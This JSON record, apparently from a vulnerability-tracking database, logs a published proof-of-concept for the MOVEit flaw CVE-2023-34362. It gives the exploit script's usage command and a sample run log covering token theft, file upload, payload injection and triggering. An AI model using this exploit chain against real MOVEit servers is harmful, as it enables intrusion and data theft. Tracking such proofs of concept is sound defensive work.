{"uuid": "4b643276-a2b7-4035-a5b4-b13119557aa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-34362", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1573", "content": "CVE-2023-34362 MOVEit\n1. exploit + crt + pem + pub\n2. exploit RUBY \nUsage:\npython CVE-2023-34362.py https://127.0.0.1\n[*] Getting sysadmin access token\n[*] Got access token\n[*] Getting FolderID\n[*] Got FolderID: 963611079\n[*] Starting file upload\n[*] Got FileID: 965943963\n[*] Injecting the payload\n[*] Payload injected\n[*] Triggering payload via resume call\n[+] Triggered the payload!\n[*] Deleting uploaded file", "creation_timestamp": "2023-06-12T16:12:29.000000Z"}